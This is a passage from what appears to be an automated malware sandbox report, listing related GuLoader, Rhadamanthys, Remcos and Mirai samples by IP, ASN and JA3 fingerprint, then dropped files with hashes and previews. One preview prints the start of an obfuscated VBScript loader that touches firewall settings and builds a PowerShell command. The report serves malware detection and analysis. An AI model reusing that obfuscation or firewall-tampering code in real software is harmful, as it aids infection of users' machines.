                                                                                                                                                                          XXX.wav.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            XXX.wav.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              202.71.109.228payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                    DOC-MARIANO _ 21ST_JUNE_2022 _.HTMGet hashmaliciousHTMLPhisherBrowse

                                                                                                                                                                                      Domains

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      gbg1.ntp.netnod.seab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                      • 194.58.203.20
                                                                                                                                                                                      download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                      • 194.58.203.20
                                                                                                                                                                                      bg.microsoft.map.fastly.netxMaSQ3Bn10.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                                      lLNOwu1HG4.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                                      XUTLbT1Wd1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                      XUTLbT1Wd1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                      Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                      tQoSuhQIdC.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                      W-2Updated.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                                      BL COAU7249606620-pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                                      https://reader.egress.com/remote.aspx/s/storage.phe.gov.uk/email/e0599f812894d1904a8fe3cf7f605bcbGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                      TeudA4phjN.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                      ntp.nict.jpab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                      • 61.205.120.130
                                                                                                                                                                                      download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                      • 133.243.238.243
                                                                                                                                                                                      wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                                                                      • 61.205.120.130
                                                                                                                                                                                      ntp1.net.berkeley.eduwE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                                                                      • 169.229.128.134

                                                                                                                                                                                      ASNs

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      NICTNationalInstituteofInformationandCommunicationsTe.pjyhwsdgkl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 133.243.12.208
                                                                                                                                                                                      splm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 133.243.110.227
                                                                                                                                                                                      download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                      • 133.243.238.243
                                                                                                                                                                                      3i4Pt1KO8v.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                      • 133.243.245.227
                                                                                                                                                                                      lEcx2N6LTK.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                      • 133.243.245.200
                                                                                                                                                                                      KrAGtlhfH1.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                      • 133.243.245.228
                                                                                                                                                                                      m1gctLHjpl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                      • 133.243.110.233
                                                                                                                                                                                      MCKPGDXGzR.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                      • 133.243.245.202
                                                                                                                                                                                      huAogaUK7o.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                      • 133.243.60.138
                                                                                                                                                                                      oLV4yvTbBK.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                      • 133.243.37.10
                                                                                                                                                                                      NTP-SEAnycastedNTPservicesfromNetnodIXPsSEab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                      • 194.58.203.20
                                                                                                                                                                                      download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                      • 194.58.203.20
                                                                                                                                                                                      regscs.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                      • 194.58.200.20
                                                                                                                                                                                      PREVIOUS CONVERSATION.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                      • 194.58.200.20
                                                                                                                                                                                      OUTSTANDING_DEBTS.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                      • 194.58.200.20
                                                                                                                                                                                      NEW PURCHASE ORDER.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                      • 194.58.200.20
                                                                                                                                                                                      STATEMENT OF ACCOUNT.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                      • 194.58.200.20
                                                                                                                                                                                      Banking_cordinates_928273.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                      • 194.58.200.20
                                                                                                                                                                                      REQUEST FOR QUOTATION.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                      • 194.58.200.20
                                                                                                                                                                                      allcrhfJER.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                      • 194.58.200.20
                                                                                                                                                                                      UCBUShome.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                      • 169.229.176.114
                                                                                                                                                                                      m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                      • 136.152.48.193
                                                                                                                                                                                      wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                                                                      • 169.229.128.134
                                                                                                                                                                                      xd.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                      • 169.229.176.118
                                                                                                                                                                                      wZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 136.152.38.2
                                                                                                                                                                                      la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 128.32.7.69
                                                                                                                                                                                      la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 128.32.229.224
                                                                                                                                                                                      mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 128.32.7.74
                                                                                                                                                                                      la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 136.152.133.22
                                                                                                                                                                                      na.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                      • 136.152.48.129

                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                      • 103.53.42.63
                                                                                                                                                                                      • 209.124.66.28
                                                                                                                                                                                      • 93.95.216.175
                                                                                                                                                                                      node-v22.12.0-x64.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 103.53.42.63
                                                                                                                                                                                      • 209.124.66.28
                                                                                                                                                                                      • 93.95.216.175
                                                                                                                                                                                      SJqOoILabX.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                      • 103.53.42.63
                                                                                                                                                                                      • 209.124.66.28
                                                                                                                                                                                      • 93.95.216.175
                                                                                                                                                                                      Marsha Rowland Signature Required.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 103.53.42.63
                                                                                                                                                                                      • 209.124.66.28
                                                                                                                                                                                      • 93.95.216.175
                                                                                                                                                                                      Rfq_po_december_purchase_list_details_specifications_09_12_2024_0000000000.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 103.53.42.63
                                                                                                                                                                                      • 209.124.66.28
                                                                                                                                                                                      • 93.95.216.175
                                                                                                                                                                                      lLNOwu1HG4.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                      • 103.53.42.63
                                                                                                                                                                                      • 209.124.66.28
                                                                                                                                                                                      • 93.95.216.175
                                                                                                                                                                                      run.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 103.53.42.63
                                                                                                                                                                                      • 209.124.66.28
                                                                                                                                                                                      • 93.95.216.175
                                                                                                                                                                                      zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 103.53.42.63
                                                                                                                                                                                      • 209.124.66.28
                                                                                                                                                                                      • 93.95.216.175
                                                                                                                                                                                      iVH355vnza.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 103.53.42.63
                                                                                                                                                                                      • 209.124.66.28
                                                                                                                                                                                      • 93.95.216.175
                                                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                      • 103.53.42.63
                                                                                                                                                                                      • 209.124.66.28
                                                                                                                                                                                      • 93.95.216.175
                                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 202.71.109.228
                                                                                                                                                                                      Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 202.71.109.228
                                                                                                                                                                                      http://crissertaoericardo.com.br/images/document.pif.rarGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                      • 202.71.109.228
                                                                                                                                                                                      tQoSuhQIdC.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 202.71.109.228
                                                                                                                                                                                      A8Uynu9lwi.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 202.71.109.228
                                                                                                                                                                                      MsmxWY8nj7.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                      • 202.71.109.228
                                                                                                                                                                                      ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                      • 202.71.109.228
                                                                                                                                                                                      Lenticels.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                      • 202.71.109.228
                                                                                                                                                                                      Request for Quotation New collaboration.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                      • 202.71.109.228
                                                                                                                                                                                      REQUEST FOR QUOATION AND PRICES 01306-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                      • 202.71.109.228
                                                                                                                                                                                      caec7ddf6889590d999d7ca1b76373b6cXjy5Y6dXX.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                      • 45.149.241.141
                                                                                                                                                                                      payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                      • 45.149.241.141
                                                                                                                                                                                      List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                      • 45.149.241.141
                                                                                                                                                                                      ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                      • 45.149.241.141
                                                                                                                                                                                      download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                      • 45.149.241.141
                                                                                                                                                                                      wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                                                                      • 45.149.241.141
                                                                                                                                                                                      0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                      • 45.149.241.141
                                                                                                                                                                                      UGcjMkPWwW.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                      • 45.149.241.141
                                                                                                                                                                                      XAhzDHAVZ2.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                      • 45.149.241.141
                                                                                                                                                                                      TctqdRX5Wq.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                      • 45.149.241.141

                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                      No context

                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                                      Entropy (8bit):1.3073559339768481
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr0:KooCEYhgYEL0In
                                                                                                                                                                                      MD5:0DAA5E527431C66FD7B73DA7030AA974
                                                                                                                                                                                      SHA1:4365168DA46EBD5809F9BF50F238784F4FEC8EEF
                                                                                                                                                                                      SHA-256:3E053C5A40659FA1D8BC4737E87920BB5A888386A22CD7E73E39C3B553CCF004
                                                                                                                                                                                      SHA-512:43F1D70EDE92445A15E891EE79BB849922C81220938591FDC984AD7C0A5A3B900D94094F0EE875C4DE319470707B8F9287D84960BF11CFE781BCB4423651CCA9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa2eb1a41, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                                      Entropy (8bit):0.4221750446537126
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                                                                                                                                      MD5:BC95AE5E2F130B6FF419B49EB28E3C86
                                                                                                                                                                                      SHA1:C1C6B6B9F872D29AF6E22AB7F404B00B6AEDFE23
                                                                                                                                                                                      SHA-256:2441F3089EEAC62058492E64E829DD7FEEA9F72C2E77C2CF686FD4F5AB2795D3
                                                                                                                                                                                      SHA-512:5F4CE166AED0D07312905E7FFA7241257BC3D4695B160BD4214AE435281018C9EC0F2DAD74745142A969558CC0A2AFF3E25E4347FCDA5E696DEC8FBE83A01A92
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:...A... .......A.......X\...;...{......................0.!..........{A..0...|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................Pq..0...|...................M...0...|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                      Entropy (8bit):0.07715467201253987
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Fu8YePe4bjjn13a/dY0spEtallcVO/lnlZMxZNQl:F1zPTj53qdaEIOewk
                                                                                                                                                                                      MD5:82A4B58919B575E2024915FE17E4B165
                                                                                                                                                                                      SHA1:15810AB86921074C0A715FF7B09C32FAA1A6071B
                                                                                                                                                                                      SHA-256:AF06F3E414BE467646FE75C66186073F12929754A4817D1CC05962804806E06B
                                                                                                                                                                                      SHA-512:04C8B51011830E88E96460C9D4298E50337CE9489AC9C62F0FA17FF2EE94423C053F6E4BA826A279590CDE112C3536E742EBEB21B1C976EA2D1FA75D6D345FA6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:;........................................;...{...0...|.......{A..............{A......{A..........{A].................M...0...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                      C:\Users\Public\lsm5k8gou5bjv.xlsx

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                                                                      Category:modified
                                                                                                                                                                                      Size (bytes):8102
                                                                                                                                                                                      Entropy (8bit):6.568397432820325
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:wc8mVrb3UH8QOTLQxizT3W7+p+1iIKoA7Yp4Ns:wc313rDQITMaUARNs
                                                                                                                                                                                      MD5:76867B70E4722699C523B3DD3EB4524E
                                                                                                                                                                                      SHA1:2F9C1F14FC0A5CF128D5C98611CA348FFA9F497F
                                                                                                                                                                                      SHA-256:8725322D24CA83BE5BAB62E530EAD8B32D1EB1FF9F671A5EC0225021D5D90FA3
                                                                                                                                                                                      SHA-512:2563FB531706A330C63A6E99AF3A2EACF3B3E891D9BD554F230BFC816FBFF7A4436FE15769EA9E89C40053D7F74C4C2C88C2EA5FBAA339171D8974C6122CACB5
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Preview:PK..........!.b.h^...........[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J.@.5...*Q>...c[.ii.....B..j7....{2..h.nm....R.....U^.7/...%....rZY...@1.__.f...q..R4D.AJ..h..>....V.....Z.9....NV..8.......ji){^..-I.."{..v^.P!XS)bR.r..K.s(.3.`c..0..........7.M4......Z.k+.|\|z.(...P..6.h_-[.@.!....Pk....2n.}.?..L... ..%......d....dN."m,..DO97*.~...8.O.c.|n.....E........B...!$}.....;{...[.....2........PK..........!..U0#....L......._rels/.rels ...(...................................

                                                                                                                                                                                      C:\Users\Public\udkz59n9.vbs

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):33059
                                                                                                                                                                                      Entropy (8bit):5.265362961453341
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:+zP1VfN3PmzgIscZ7kjmFxCueMJCwN7jxjHL0DxiPcx54TETfSz4:IPvfdmEzcZ7kjKxCbgN78k7s
                                                                                                                                                                                      MD5:08450E7F899444A80F64E7AEFEBDC278
                                                                                                                                                                                      SHA1:E26405B0825B38086890BCA61D07BB065EB446C0
                                                                                                                                                                                      SHA-256:E4801D7FB5B9EB28FB32971B2935FB6A22EEC84F892FA724EDB5E6586110B507
                                                                                                                                                                                      SHA-512:458B0FD0A5486FBA3F6B58FAB334D7F0C718D2FD87CDC46FDCC7F4DD9F41776BD622F0E7063A86CA506452678FC6977476B1E607C52668964B518EAF3052EC30
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Preview:......Spildevandsbekendt = Right("Epikuriske",191)........Strategdomestiskehammo = Strategdomestiskehammo & "Skandinaviseringerne" & "Undervalue" ........'Plasmodiocarpous nonapparitional irgrnnes? microphonograph;..'Braktuds clasper stvnene....Set Neonlysskiltenes185 = CreateObject("HNetCfg.FwMgr")....Set Kampucheas = Neonlysskiltenes185.LocalPolicy.CurrentProfile....Set Unkirk = Kampucheas.ICMPSettings..............'Yalelaasen? jazzstedet199 dedikerende, undeepened unrationable!..Function Dryptrredes ()....Const Hftendes = "discjockeyernes glane"..Const Jagerflyenes = -44773..Const Mercurialize = 57208..Const Couched = -48409..For I = 1566 To 84 step - 1..Rovfiskeriernes = Rovfiskeriernes & "Televrkers"....afskedssalutslairdiedis = "Askesis"..Miljbeskyttelsesreglement = Ucase(afskedssalutslairdiedis) ....next....Orniscopist = Orniscopist + ";$Banky='Myohem"..Orniscopist = Orniscopist + "oglobin';;$Tadpolel"..Orniscopist = Orniscopist + "ikemmuworde='Cin"..'Politician fedtlder;..Ornis

                                                                                                                                                                                      C:\Users\Public\~$lsm5k8gou5bjv.xlsx

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):165
                                                                                                                                                                                      Entropy (8bit):1.4377382811115937
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                                                                      MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                                                                      SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                                                                      SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                                                                                      SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):71954
                                                                                                                                                                                      Entropy (8bit):7.996617769952133
                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):328
                                                                                                                                                                                      Entropy (8bit):3.2258091096385466
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:kKOVlL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:qkDImsLNkPlE99SNxAhUe/3
                                                                                                                                                                                      MD5:A0ACECFE942469FDCFF64073B7D1DCF4
                                                                                                                                                                                      SHA1:B00027775A23AF76B656EEDB1A597D93F2A64CEB
                                                                                                                                                                                      SHA-256:897EFCF5B28F9C7F01D27833CA4D45CA3D46011F8A1C0F8CFD7619D0F93A878C
                                                                                                                                                                                      SHA-512:440D8BAA882473206358C4608C2D10B4D54D5CE7DA88BB2903AFE08A492A911A2BAE8BAB8D3C6BCFA28F03E0759D9953FDDCBE6251991BDF290AC528C95F19A6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:p...... .........wm.bJ..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:modified
                                                                                                                                                                                      Size (bytes):11608
                                                                                                                                                                                      Entropy (8bit):4.8908305915084105
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                                                                                                                                      MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                                                                                                                                      SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                                                                                                                                      SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                                                                                                                                      SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...

                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                      Entropy (8bit):1.1510207563435464
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                                                                                                                                                      MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                                                                                                                                                      SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                                                                                                                                                      SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                                                                                                                                                      SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:@...e.................................^..............@..........

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4d4wu0co.ket.psm1

                                                                                                                                                                                      Download File
